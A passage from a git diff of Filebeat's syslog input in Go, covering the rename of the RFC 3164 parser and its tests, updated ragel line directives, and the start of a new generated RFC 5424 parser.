Parse(data []byte, event *event) { } } -//line parser.rl:81 +//line parser/common.rl:91 event.SetHostname(data[tok:p]) @@ -1103,7 +1103,7 @@ func Parse(data []byte, event *event) { goto _test_eof35 } st_case_35: -//line parser.go:1080 +//line rfc3164_parser.go:1080 switch data[(p)] { case 32: goto tr45 @@ -1136,11 +1136,11 @@ func Parse(data []byte, event *event) { } goto st2 tr41: -//line parser.rl:22 +//line parser/common.rl:3 tok = p -//line parser.rl:70 +//line parser/common.rl:80 if p-1 > 0 { for _, b := range noDuplicates { @@ -1155,7 +1155,7 @@ func Parse(data []byte, event *event) { goto st36 tr44: -//line parser.rl:70 +//line parser/common.rl:80 if p-1 > 0 { for _, b := range noDuplicates { @@ -1174,7 +1174,7 @@ func Parse(data []byte, event *event) { goto _test_eof36 } st_case_36: -//line parser.go:1147 +//line rfc3164_parser.go:1147 switch data[(p)] { case 58: goto tr57 @@ -1200,21 +1200,21 @@ func Parse(data []byte, event *event) { } goto st2 tr35: -//line parser.rl:58 +//line parser/common.rl:39 event.SetSecond(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st37 tr69: -//line parser.rl:62 +//line parser/common.rl:43 event.SetNanosecond(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1224,7 +1224,7 @@ func Parse(data []byte, event *event) { goto _test_eof37 } st_case_37: -//line parser.go:1197 +//line rfc3164_parser.go:1197 if 48 <= data[(p)] && data[(p)] <= 57 { goto st38 } @@ -1283,19 +1283,19 @@ func Parse(data []byte, event *event) { } goto st2 tr37: -//line parser.rl:58 +//line parser/common.rl:39 event.SetSecond(data[tok:p]) goto st42 tr65: -//line parser.rl:93 +//line parser/common.rl:103 event.SetTimeZone(data[tok:p]) goto st42 tr71: -//line parser.rl:62 +//line parser/common.rl:43 event.SetNanosecond(data[tok:p]) @@ -1305,7 +1305,7 @@ func Parse(data []byte, event *event) { goto _test_eof42 } st_case_42: -//line parser.go:1278 +//line rfc3164_parser.go:1278 if data[(p)] == 32 { goto st23 } @@ -1314,7 +1314,7 @@ func Parse(data []byte, event *event) { } goto st2 tr63: -//line parser.rl:93 +//line parser/common.rl:103 event.SetTimeZone(data[tok:p]) @@ -1324,7 +1324,7 @@ func Parse(data []byte, event *event) { goto _test_eof43 } st_case_43: -//line parser.go:1297 +//line rfc3164_parser.go:1297 if data[(p)] == 32 { goto st23 } @@ -1338,7 +1338,7 @@ func Parse(data []byte, event *event) { } goto st2 tr36: -//line parser.rl:58 +//line parser/common.rl:39 event.SetSecond(data[tok:p]) @@ -1348,13 +1348,13 @@ func Parse(data []byte, event *event) { goto _test_eof44 } st_case_44: -//line parser.go:1321 +//line rfc3164_parser.go:1321 if 48 <= data[(p)] && data[(p)] <= 57 { goto tr67 } goto st2 tr67: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1364,7 +1364,7 @@ func Parse(data []byte, event *event) { goto _test_eof45 } st_case_45: -//line parser.go:1337 +//line rfc3164_parser.go:1337 switch data[(p)] { case 32: goto tr68 @@ -1389,21 +1389,21 @@ func Parse(data []byte, event *event) { } goto st2 tr38: -//line parser.rl:58 +//line parser/common.rl:39 event.SetSecond(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st46 tr72: -//line parser.rl:62 +//line parser/common.rl:43 event.SetNanosecond(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1413,7 +1413,7 @@ func Parse(data []byte, event *event) { goto _test_eof46 } st_case_46: -//line parser.go:1386 +//line rfc3164_parser.go:1386 switch data[(p)] { case 32: goto tr61 @@ -1429,7 +1429,7 @@ func Parse(data []byte, event *event) { } goto st2 tr26: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1439,23 +1439,23 @@ func Parse(data []byte, event *event) { goto _test_eof47 } st_case_47: -//line parser.go:1412 +//line rfc3164_parser.go:1412 if 48 <= data[(p)] && data[(p)] <= 51 { goto st16 } goto st2 tr4: -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st48 tr136: -//line parser.rl:97 +//line parser/common.rl:107 event.SetSequence(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1465,7 +1465,7 @@ func Parse(data []byte, event *event) { goto _test_eof48 } st_case_48: -//line parser.go:1438 +//line rfc3164_parser.go:1438 switch data[(p)] { case 112: goto st49 @@ -1498,7 +1498,7 @@ func Parse(data []byte, event *event) { } goto st2 tr77: -//line parser.rl:34 +//line parser/common.rl:15 event.SetMonth(data[tok:p]) @@ -1508,7 +1508,7 @@ func Parse(data []byte, event *event) { goto _test_eof51 } st_case_51: -//line parser.go:1481 +//line rfc3164_parser.go:1481 switch data[(p)] { case 32: goto st52 @@ -1538,7 +1538,7 @@ func Parse(data []byte, event *event) { } goto st2 tr82: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1548,7 +1548,7 @@ func Parse(data []byte, event *event) { goto _test_eof53 } st_case_53: -//line parser.go:1521 +//line rfc3164_parser.go:1521 if data[(p)] == 32 { goto tr83 } @@ -1557,7 +1557,7 @@ func Parse(data []byte, event *event) { } goto st2 tr83: -//line parser.rl:46 +//line parser/common.rl:27 event.SetDay(data[tok:p]) @@ -1567,7 +1567,7 @@ func Parse(data []byte, event *event) { goto _test_eof54 } st_case_54: -//line parser.go:1540 +//line rfc3164_parser.go:1540 if data[(p)] == 50 { goto tr85 } @@ -1576,7 +1576,7 @@ func Parse(data []byte, event *event) { } goto st2 tr84: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1586,7 +1586,7 @@ func Parse(data []byte, event *event) { goto _test_eof55 } st_case_55: -//line parser.go:1559 +//line rfc3164_parser.go:1559 if 48 <= data[(p)] && data[(p)] <= 57 { goto st56 } @@ -1601,7 +1601,7 @@ func Parse(data []byte, event *event) { } goto st2 tr87: -//line parser.rl:50 +//line parser/common.rl:31 event.SetHour(data[tok:p]) @@ -1611,13 +1611,13 @@ func Parse(data []byte, event *event) { goto _test_eof57 } st_case_57: -//line parser.go:1584 +//line rfc3164_parser.go:1584 if 48 <= data[(p)] && data[(p)] <= 53 { goto tr88 } goto st2 tr88: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1627,7 +1627,7 @@ func Parse(data []byte, event *event) { goto _test_eof58 } st_case_58: -//line parser.go:1600 +//line rfc3164_parser.go:1600 if 48 <= data[(p)] && data[(p)] <= 57 { goto st59 } @@ -1642,7 +1642,7 @@ func Parse(data []byte, event *event) { } goto st2 tr90: -//line parser.rl:54 +//line parser/common.rl:35 event.SetMinute(data[tok:p]) @@ -1652,13 +1652,13 @@ func Parse(data []byte, event *event) { goto _test_eof60 } st_case_60: -//line parser.go:1625 +//line rfc3164_parser.go:1625 if 48 <= data[(p)] && data[(p)] <= 53 { goto tr91 } goto st2 tr91: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1668,7 +1668,7 @@ func Parse(data []byte, event *event) { goto _test_eof61 } st_case_61: -//line parser.go:1641 +//line rfc3164_parser.go:1641 if 48 <= data[(p)] && data[(p)] <= 57 { goto st62 } @@ -1691,7 +1691,7 @@ func Parse(data []byte, event *event) { } goto st2 tr93: -//line parser.rl:58 +//line parser/common.rl:39 event.SetSecond(data[tok:p]) @@ -1701,13 +1701,13 @@ func Parse(data []byte, event *event) { goto _test_eof63 } st_case_63: -//line parser.go:1674 +//line rfc3164_parser.go:1674 if 48 <= data[(p)] && data[(p)] <= 57 { goto tr94 } goto st2 tr94: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1717,7 +1717,7 @@ func Parse(data []byte, event *event) { goto _test_eof64 } st_case_64: -//line parser.go:1690 +//line rfc3164_parser.go:1690 switch data[(p)] { case 32: goto tr68 @@ -1734,7 +1734,7 @@ func Parse(data []byte, event *event) { } goto st2 tr85: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1744,13 +1744,13 @@ func Parse(data []byte, event *event) { goto _test_eof65 } st_case_65: -//line parser.go:1717 +//line rfc3164_parser.go:1717 if 48 <= data[(p)] && data[(p)] <= 51 { goto st56 } goto st2 tr80: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1760,7 +1760,7 @@ func Parse(data []byte, event *event) { goto _test_eof66 } st_case_66: -//line parser.go:1733 +//line rfc3164_parser.go:1733 if data[(p)] == 32 { goto tr83 } @@ -1774,7 +1774,7 @@ func Parse(data []byte, event *event) { } goto st2 tr81: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1784,7 +1784,7 @@ func Parse(data []byte, event *event) { goto _test_eof67 } st_case_67: -//line parser.go:1757 +//line rfc3164_parser.go:1757 if data[(p)] == 32 { goto tr83 } @@ -1861,17 +1861,17 @@ func Parse(data []byte, event *event) { } goto st2 tr5: -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st74 tr137: -//line parser.rl:97 +//line parser/common.rl:107 event.SetSequence(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1881,7 +1881,7 @@ func Parse(data []byte, event *event) { goto _test_eof74 } st_case_74: -//line parser.go:1854 +//line rfc3164_parser.go:1854 if data[(p)] == 101 { goto st75 } @@ -1947,17 +1947,17 @@ func Parse(data []byte, event *event) { } goto st2 tr6: -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st81 tr138: -//line parser.rl:97 +//line parser/common.rl:107 event.SetSequence(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1967,7 +1967,7 @@ func Parse(data []byte, event *event) { goto _test_eof81 } st_case_81: -//line parser.go:1940 +//line rfc3164_parser.go:1940 if data[(p)] == 101 { goto st82 } @@ -2033,17 +2033,17 @@ func Parse(data []byte, event *event) { } goto st2 tr7: -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st88 tr139: -//line parser.rl:97 +//line parser/common.rl:107 event.SetSequence(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -2053,7 +2053,7 @@ func Parse(data []byte, event *event) { goto _test_eof88 } st_case_88: -//line parser.go:2026 +//line rfc3164_parser.go:2026 switch data[(p)] { case 97: goto st89 @@ -2128,17 +2128,17 @@ func Parse(data []byte, event *event) { } goto st2 tr8: -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st94 tr140: -//line parser.rl:97 +//line parser/common.rl:107 event.SetSequence(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -2148,7 +2148,7 @@ func Parse(data []byte, event *event) { goto _test_eof94 } st_case_94: -//line parser.go:2121 +//line rfc3164_parser.go:2121 if data[(p)] == 97 { goto st95 } @@ -2195,17 +2195,17 @@ func Parse(data []byte, event *event) { } goto st2 tr9: -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st98 tr141: -//line parser.rl:97 +//line parser/common.rl:107 event.SetSequence(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -2215,7 +2215,7 @@ func Parse(data []byte, event *event) { goto _test_eof98 } st_case_98: -//line parser.go:2188 +//line rfc3164_parser.go:2188 if data[(p)] == 111 { goto st99 } @@ -2230,17 +2230,17 @@ func Parse(data []byte, event *event) { } goto st2 tr10: -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st100 tr142: -//line parser.rl:97 +//line parser/common.rl:107 event.SetSequence(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -2250,7 +2250,7 @@ func Parse(data []byte, event *event) { goto _test_eof100 } st_case_100: -//line parser.go:2223 +//line rfc3164_parser.go:2223 if data[(p)] == 99 { goto st101 } @@ -2280,17 +2280,17 @@ func Parse(data []byte, event *event) { } goto st2 tr11: -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st103 tr143: -//line parser.rl:97 +//line parser/common.rl:107 event.SetSequence(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -2300,7 +2300,7 @@ func Parse(data []byte, event *event) { goto _test_eof103 } st_case_103: -//line parser.go:2273 +//line rfc3164_parser.go:2273 if data[(p)] == 101 { goto st104 } @@ -2339,7 +2339,7 @@ func Parse(data []byte, event *event) { } goto st2 tr2: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -2349,7 +2349,7 @@ func Parse(data []byte, event *event) { goto _test_eof107 } st_case_107: -//line parser.go:2322 +//line rfc3164_parser.go:2322 if data[(p)] == 58 { goto st112 } @@ -2421,7 +2421,7 @@ func Parse(data []byte, event *event) { } goto st2 tr132: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -2431,7 +2431,7 @@ func Parse(data []byte, event *event) { goto _test_eof113 } st_case_113: -//line parser.go:2404 +//line rfc3164_parser.go:2404 switch data[(p)] { case 32: goto tr134 @@ -2461,7 +2461,7 @@ func Parse(data []byte, event *event) { } goto tr133 tr3: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -2471,13 +2471,13 @@ func Parse(data []byte, event *event) { goto _test_eof114 } st_case_114: -//line parser.go:2444 +//line rfc3164_parser.go:2444 if 48 <= data[(p)] && data[(p)] <= 57 { goto tr144 } goto st2 tr144: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -2487,7 +2487,7 @@ func Parse(data []byte, event *event) { goto _test_eof115 } st_case_115: -//line parser.go:2460 +//line rfc3164_parser.go:2460 if data[(p)] == 62 { goto tr146 } @@ -2541,7 +2541,7 @@ func Parse(data []byte, event *event) { } goto st2 tr146: -//line parser.rl:26 +//line parser/common.rl:7 event.SetPriority(data[tok:p]) @@ -2551,7 +2551,7 @@ func Parse(data []byte, event *event) { goto _test_eof120 } st_case_120: -//line parser.go:2524 +//line rfc3164_parser.go:2524 switch data[(p)] { case 32: goto tr1 @@ -2587,7 +2587,7 @@ func Parse(data []byte, event *event) { st_case_1: goto tr12 tr12: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -2597,7 +2597,7 @@ func Parse(data []byte, event *event) { goto _test_eof121 } st_case_121: -//line parser.go:2570 +//line rfc3164_parser.go:2570 goto st121 st_out: _test_eof2: @@ -2970,16 +2970,16 @@ func Parse(data []byte, event *event) { if (p) == eof { switch cs { case 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121: -//line parser.rl:30 +//line parser/common.rl:11 event.SetMessage(data[tok:p]) -//line parser.go:2703 +//line rfc3164_parser.go:2703 } } } -//line parser.rl:105 +//line parser/rfc3164_parser.rl:28 } diff --git a/filebeat/input/syslog/parser_test.go b/filebeat/input/syslog/rfc3164_test.go similarity index 98% rename from filebeat/input/syslog/parser_test.go rename to filebeat/input/syslog/rfc3164_test.go index 1c83a990e55..185f8df7d3a 100644 --- a/filebeat/input/syslog/parser_test.go +++ b/filebeat/input/syslog/rfc3164_test.go @@ -25,7 +25,7 @@ import ( "github.com/stretchr/testify/assert" ) -func TestParseSyslog(t *testing.T) { +func TestParserRFC3164Syslog(t *testing.T) { tests := []struct { title string log []byte @@ -668,7 +668,7 @@ func TestParseSyslog(t *testing.T) { for _, test := range tests { t.Run(fmt.Sprintf("%s:%s", test.title, string(test.log)), func(t *testing.T) { l := newEvent() - Parse(test.log, l) + ParserRFC3164(test.log, l) assert.Equal(t, test.syslog.Message(), l.Message()) assert.Equal(t, test.syslog.Hostname(), l.Hostname()) assert.Equal(t, test.syslog.Priority(), l.Priority()) @@ -707,7 +707,7 @@ func TestMonth(t *testing.T) { t.Run("Month "+shortMonth, func(t *testing.T) { log := fmt.Sprintf("<34>%s 1 22:14:15 mymachine postfix/smtpd[2000]: 'su root' failed for lonvick on /dev/pts/8", shortMonth) l := newEvent() - Parse([]byte(log), l) + ParserRFC3164([]byte(log), l) assert.Equal(t, month, l.Month()) }) } @@ -718,7 +718,7 @@ func TestMonth(t *testing.T) { t.Run("Month "+month.String(), func(t *testing.T) { log := fmt.Sprintf("<34>%s 1 22:14:15 mymachine postfix/smtpd[2000]: 'su root' failed for lonvick on /dev/pts/8", month.String()) l := newEvent() - Parse([]byte(log), l) + ParserRFC3164([]byte(log), l) assert.Equal(t, month, l.Month()) }) } @@ -730,7 +730,7 @@ func TestDay(t *testing.T) { t.Run(fmt.Sprintf("Day %d", d), func(t *testing.T) { log := fmt.Sprintf("<34>Oct %2d 22:14:15 mymachine postfix/smtpd[2000]: 'su root' failed for lonvick on /dev/pts/8", d) l := newEvent() - Parse([]byte(log), l) + ParserRFC3164([]byte(log), l) assert.Equal(t, d, l.Day()) }) } @@ -741,7 +741,7 @@ func TestHour(t *testing.T) { t.Run(fmt.Sprintf("Hour %d", d), func(t *testing.T) { log := fmt.Sprintf("<34>Oct 11 %02d:14:15 mymachine postfix/smtpd[2000]: 'su root' failed for lonvick on /dev/pts/8", d) l := newEvent() - Parse([]byte(log), l) + ParserRFC3164([]byte(log), l) assert.Equal(t, d, l.Hour()) }) } @@ -752,7 +752,7 @@ func TestMinute(t *testing.T) { t.Run(fmt.Sprintf("Minute %d", d), func(t *testing.T) { log := fmt.Sprintf("<34>Oct 11 10:%02d:15 mymachine postfix/smtpd[2000]: 'su root' failed for lonvick on /dev/pts/8", d) l := newEvent() - Parse([]byte(log), l) + ParserRFC3164([]byte(log), l) assert.Equal(t, d, l.Minute()) }) } @@ -763,7 +763,7 @@ func TestSecond(t *testing.T) { t.Run(fmt.Sprintf("Second %d", d), func(t *testing.T) { log := fmt.Sprintf("<34>Oct 11 10:15:%02d mymachine postfix/smtpd[2000]: 'su root' failed for lonvick on /dev/pts/8", d) l := newEvent() - Parse([]byte(log), l) + ParserRFC3164([]byte(log), l) assert.Equal(t, d, l.Second()) }) } @@ -774,7 +774,7 @@ func TestPriority(t *testing.T) { t.Run(fmt.Sprintf("Priority %d", d), func(t *testing.T) { log := fmt.Sprintf("<%d>Oct 11 10:15:15 mymachine postfix/smtpd[2000]: 'su root' failed for lonvick on /dev/pts/8", d) l := newEvent() - Parse([]byte(log), l) + ParserRFC3164([]byte(log), l) assert.Equal(t, d, l.Priority()) }) return @@ -783,12 +783,12 @@ func TestPriority(t *testing.T) { var e *event -func BenchmarkParser(b *testing.B) { +func BenchmarkParserRFC3164r(b *testing.B) { b.ReportAllocs() l := newEvent() log := []byte("<34>Oct 11 22:14:15 mymachine su: 'su root' failed for lonvick on /dev/pts/8") for n := 0; n < b.N; n++ { - Parse(log, l) + ParserRFC3164(log, l) e = l } } diff --git a/filebeat/input/syslog/rfc5424_parser.go b/filebeat/input/syslog/rfc5424_parser.go new file mode 100644 index 00000000000..a7efafa55b7 --- /dev/null +++ b/filebeat/input/syslog/rfc5424_parser.go @@ -0,0 +1,10959 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +//line parser/rfc5424_parser.rl:1 +// Code generated by ragel DO NOT EDIT. +package syslog + +//line rfc5424_parser.go:8 +const syslog_rfc5424_start int = 1 +const syslog_rfc5424_first_final int = 587 +const syslog_rfc5424_error int = 0 + +const syslog_rfc5424_en_main int = 1 + +//line parser/rfc5424_parser.rl:9 + +type machineState struct { + sd_id string + sd_param_name string + sd_value_bs []int +} + +func ParserRFC5424(data []byte, event *event) { + var p, cs int + state := machineState{ + sd_value_bs: []int{}, + } + pe := len(data) + tok := 0 + eof := len(data) + +//line rfc5424_parser.go:34 + { + cs = syslog_rfc5424_start + } + +//line rfc5424_parser.go:39 + { + if (p) == (pe) { + goto _test_eof + } + switch cs { + case 1: + goto st_case_1 + case 0: + goto st_case_0 + case 2: + goto st_case_2 + case 3: + goto st_case_3 + case 4: + goto st_case_4 + case 5: + goto st_case_5 + case 6: + goto st_case_6 + case 7: + goto st_case_7 + case 8: + goto st_case_8 + case 9: + goto st_case_9 + case 10: + goto st_case_10 + case 11: + goto st_case_11 + case 12: + goto st_case_12 + case 13: + goto st_case_13 + case 14: + goto st_case_14 + case 15: + goto st_case_15 + case 16: + goto st_case_16 + case 587: + goto st_case_587 + case 588: + goto st_case_588 + case 589: + goto st_case_589 + case 17: + goto st_case_17 + case 18: + goto st_case_18 + case 19: + goto st_case_19 + case 20: + goto st_case_20 + case 21: + goto st_case_21 + case 22: + goto st_case_22 + case 23: + goto st_case_23 + case 24: + goto st_case_24 + case 25: + goto st_case_25 + case 26: + goto st_case_26 + case 27: + goto st_case_27 + case 28: + goto st_case_28 + case 29: + goto st_case_29 + case 30: + goto st_case_30 + case 31: + goto st_case_31 + case 32: + goto st_case_32 + case 33: + goto st_case_33 + case 34: + goto st_case_34 + case 35: + goto st_case_35 + case 36: + goto st_case_36 + case 37: + goto st_case_37 + case 38: + goto st_case_38 + case 39: + goto st_case_39 + case 40: + goto st_case_40 + case 41: + goto st_case_41 + case 42: + goto st_case_42 + case 43: + goto st_case_43 + case 44: + goto st_case_44 + case 45: + goto st_case_45 + case 46: + goto st_case_46 + case 47: + goto st_case_47 + case 48: + goto st_case_48 + case 49: + goto st_case_49 + case 50: + goto st_case_50 + case 51: + goto st_case_51 + case 52: + goto st_case_52 + case 53: + goto st_case_53 + case 54: + goto st_case_54 + case 55: + goto st_case_55 + case 590: + goto st_case_590 + case 56: + goto st_case_56 + case 57: + goto st_case_57 + case 58: + goto st_case_58 + case 59: + goto st_case_59 + case 60: + goto st_case_60 + case 61: + goto st_case_61 + case 62: + goto st_case_62 + case 63: + goto st_case_63 + case 64: + goto st_case_64 + case 65: + goto st_case_65 + case 66: + goto st_case_66 + case 67: + goto st_case_67 + case 68: + goto st_case_68 + case 69: + goto st_case_69 + case 70: + goto st_case_70 + case 71: + goto st_case_71 + case 72: + goto st_case_72 + case 73: + goto st_case_73 + case 74: + goto st_case_74 + case 75: + goto st_case_75 + case 76: + goto st_case_76 + case 77: + goto st_case_77 + case 78: + goto st_case_78 + case 79: + goto st_case_79 + case 80: + goto st_case_80 + case 81: + goto st_case_81 + case 82: + goto st_case_82 + case 83: + goto st_case_83 + case 84: + goto st_case_84 + case 85: + goto st_case_85 + case 86: + goto st_case_86 + case 87: + goto st_case_87 + case 88: + goto st_case_88 + case 89: + goto st_case_89 + case 90: + goto st_case_90 + case 91: + goto st_case_91 + case 92: + goto st_case_92 + case 93: + goto st_case_93 + case 94: + goto st_case_94 + case 95: + goto st_case_95 + case 96: + goto st_case_96 + case 97: + goto st_case_97 + case 98: + goto st_case_98 + case 99: + goto st_case_99 + case 100: + goto st_case_100 + case 101: + goto st_case_101 + case 102: + goto st_case_102 + case 103: + goto st_case_103 + case 104: + goto st_case_104 + case 105: + goto st_case_105 + case 106: + goto st_case_106 + case 107: + goto st_case_107 + case 108: + goto st_case_108 + case 109: + goto st_case_109 + case 110: + goto st_case_110 + case 111: + goto st_case_111 + case 112: + goto st_case_112 + case 113: + goto st_case_113 + case 114: + goto st_case_114 + case 115: + goto st_case_115 + case 116: + goto st_case_116 + case 117: + goto st_case_117 + case 118: + goto st_case_118 + case 119: + goto st_case_119 + case 120: + goto st_case_120 + case 121: + goto st_case_121 + case 122: + goto st_case_122 + case 123: + goto st_case_123 + case 124: + goto st_case_124 + case 125: + goto st_case_125 + case 126: + goto st_case_126 + case 127: + goto st_case_127 + case 128: + goto st_case_128 + case 129: + goto st_case_129 + case 130: + goto st_case_130 + case 131: + goto st_case_131 + case 132: + goto st_case_132 + case 133: + goto st_case_133 + case 134: + goto st_case_134 + case 135: + goto st_case_135 + case 136: + goto st_case_136 + case 137: + goto st_case_137 + case 138: + goto st_case_138 + case 139: + goto st_case_139 + case 140: + goto st_case_140 + case 141: + goto st_case_141 + case 142: + goto st_case_142 + case 143: + goto st_case_143 + case 144: + goto st_case_144 + case 145: + goto st_case_145 + case 146: + goto st_case_146 + case 147: + goto st_case_147 + case 148: + goto st_case_148 + case 149: + goto st_case_149 + case 150: + goto st_case_150 + case 151: + goto st_case_151 + case 152: + goto st_case_152 + case 153: + goto st_case_153 + case 154: + goto st_case_154 + case 155: + goto st_case_155 + case 156: + goto st_case_156 + case 157: + goto st_case_157 + case 158: + goto st_case_158 + case 159: + goto st_case_159 + case 160: + goto st_case_160 + case 161: + goto st_case_161 + case 162: + goto st_case_162 + case 163: + goto st_case_163 + case 164: + goto st_case_164 + case 165: + goto st_case_165 + case 166: + goto st_case_166 + case 167: + goto st_case_167 + case 168: + goto st_case_168 + case 169: + goto st_case_169 + case 170: + goto st_case_170 + case 171: + goto st_case_171 + case 172: + goto st_case_172 + case 173: + goto st_case_173 + case 174: + goto st_case_174 + case 175: + goto st_case_175 + case 176: + goto st_case_176 + case 177: + goto st_case_177 + case 178: + goto st_case_178 + case 179: + goto st_case_179 + case 180: + goto st_case_180 + case 181: + goto st_case_181 + case 182: + goto st_case_182 + case 183: + goto st_case_183 + case 184: + goto st_case_184 + case 185: + goto st_case_185 + case 186: + goto st_case_186 + case 187: + goto st_case_187 + case 188: + goto st_case_188 + case 189: + goto st_case_189 + case 190: + goto st_case_190 + case 191: + goto st_case_191 + case 192: + goto st_case_192 + case 193: + goto st_case_193 + case 194: + goto st_case_194 + case 195: + goto st_case_195 + case 196: + goto st_case_196 + case 197: + goto st_case_197 + case 198: + goto st_case_198 + case 199: + goto st_case_199 + case 200: + goto st_case_200 + case 201: + goto st_case_201 + case 202: + goto st_case_202 + case 203: + goto st_case_203 + case 204: + goto st_case_204 + case 205: + goto st_case_205 + case 206: + goto st_case_206 + case 207: + goto st_case_207 + case 208: + goto st_case_208 + case 209: + goto st_case_209 + case 210: + goto st_case_210 + case 211: + goto st_case_211 + case 212: + goto st_case_212 + case 213: + goto st_case_213 + case 214: + goto st_case_214 + case 215: + goto st_case_215 + case 216: + goto st_case_216 + case 217: + goto st_case_217 + case 218: + goto st_case_218 + case 219: + goto st_case_219 + case 220: + goto st_case_220 + case 221: + goto st_case_221 + case 222: + goto st_case_222 + case 223: + goto st_case_223 + case 224: + goto st_case_224 + case 225: + goto st_case_225 + case 226: + goto st_case_226 + case 227: + goto st_case_227 + case 228: + goto st_case_228 + case 229: + goto st_case_229 + case 230: + goto st_case_230 + case 231: + goto st_case_231 + case 232: + goto st_case_232 + case 233: + goto st_case_233 + case 234: + goto st_case_234 + case 235: + goto st_case_235 + case 236: + goto st_case_236 + case 237: + goto st_case_237 + case 238: + goto st_case_238 + case 239: + goto st_case_239 + case 240: + goto st_case_240 + case 241: + goto st_case_241 + case 242: + goto st_case_242 + case 243: + goto st_case_243 + case 244: + goto st_case_244 + case 245: + goto st_case_245 + case 246: + goto st_case_246 + case 247: + goto st_case_247 + case 248: + goto st_case_248 + case 249: + goto st_case_249 + case 250: + goto st_case_250 + case 251: + goto st_case_251 + case 252: + goto st_case_252 + case 253: + goto st_case_253 + case 254: + goto st_case_254 + case 255: + goto st_case_255 + case 256: + goto st_case_256 + case 257: + goto st_case_257 + case 258: + goto st_case_258 + case 259: + goto st_case_259 + case 260: + goto st_case_260 + case 261: + goto st_case_261 + case 262: + goto st_case_262 + case 263: + goto st_case_263 + case 264: + goto st_case_264 + case 265: + goto st_case_265 + case 266: + goto st_case_266 + case 267: + goto st_case_267 + case 268: + goto st_case_268 + case 269: + goto st_case_269 + case 270: + goto st_case_270 + case 271: + goto st_case_271 + case 272: + goto st_case_272 + case 273: + goto st_case_273 + case 274: + goto st_case_274 + case 275: + goto st_case_275 + case 276: + goto st_case_276 + case 277: + goto st_case_277 + case 278: + goto st_case_278 + case 279: + goto st_case_279 + case 280: + goto st_case_280 + case 281: + goto st_case_281 + case 282: + goto st_case_282 + case 283: + goto st_case_283 + case 284: + goto st_case_284 + case 285: + goto st_case_285 + case 286: + goto st_case_286 + case 287: + goto st_case_287 + case 288: + goto st_case_288 + case 289: + goto st_case_289 + case 290: + goto st_case_290 + case 291: + goto st_case_291 + case 292: + goto st_case_292 + case 293: + goto st_case_293 + case 294: + goto st_case_294 + case 295: + goto st_case_295 + case 296: + goto st_case_296 + case 297: + goto st_case_297 + case 298: + goto st_case_298 + case 299: + goto st_case_299 + case 300: + goto st_case_300 + case 301: + goto st_case_301 + case 302: + goto st_case_302 + case 303: + goto st_case_303 + case 304: + goto st_case_304 + case 305: + goto st_case_305 + case 306: + goto st_case_306 + case 307: + goto st_case_307 + case 308: + goto st_case_308 + case 309: + goto st_case_309 + case 310: + goto st_case_310 + case 311: + goto st_case_311 + case 312: + goto st_case_312 + case 313: + goto st_case_313 + case 314: + goto st_case_314 + case 315: + goto st_case_315 + case 316: + goto st_case_316 + case 317: + goto st_case_317 + case 318: + goto st_case_318 + case 319: + goto st_case_319 + case 320: + goto st_case_320 + case 321: + goto st_case_321 + case 322: + goto st_case_322 + case 323: + goto st_case_323 + case 324: + goto st_case_324 + case 325: + goto st_case_325 + case 326: + goto st_case_326 + case 327: + goto st_case_327 + case 328: + goto st_case_328 + case 329: + goto 